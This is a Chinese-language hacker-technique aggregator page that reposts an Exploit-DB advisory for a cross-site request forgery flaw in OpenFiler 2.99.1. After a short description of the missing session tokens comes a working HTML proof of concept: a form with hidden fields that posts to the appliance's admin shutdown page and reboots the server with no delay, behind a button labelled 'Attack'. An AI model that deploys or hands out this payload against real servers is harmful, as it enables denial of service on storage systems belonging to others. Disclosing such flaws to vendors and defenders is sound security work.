记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

WEB应用漏洞: - OpenFiler 2.99.1 - CSRF Vulnerability

2014-09-30 04:05
<!--
# Exploit Title: DoS via CSRF in openfiler
# Exploit author: Dolev Farhi @dolevff
# Date 07/05/2014
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
# CVE: N/A


Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.



Vulnerability Description
=========================
it is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens.


Steps to reproduce / PoC:
=========================
-->
<html>
<div align="center">
<pre>

<h2><b>DoS <b></h2>
<body>
<form
action="https://ip.add.re.ss:446/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="Attack" />
</form>
</body>
</div>
</html>








知识来源: www.exploit-db.com/exploits/34818

阅读:100457 | 评论:0 | 标签:webapps CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“WEB应用漏洞: - OpenFiler 2.99.1 - CSRF Vulnerability”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云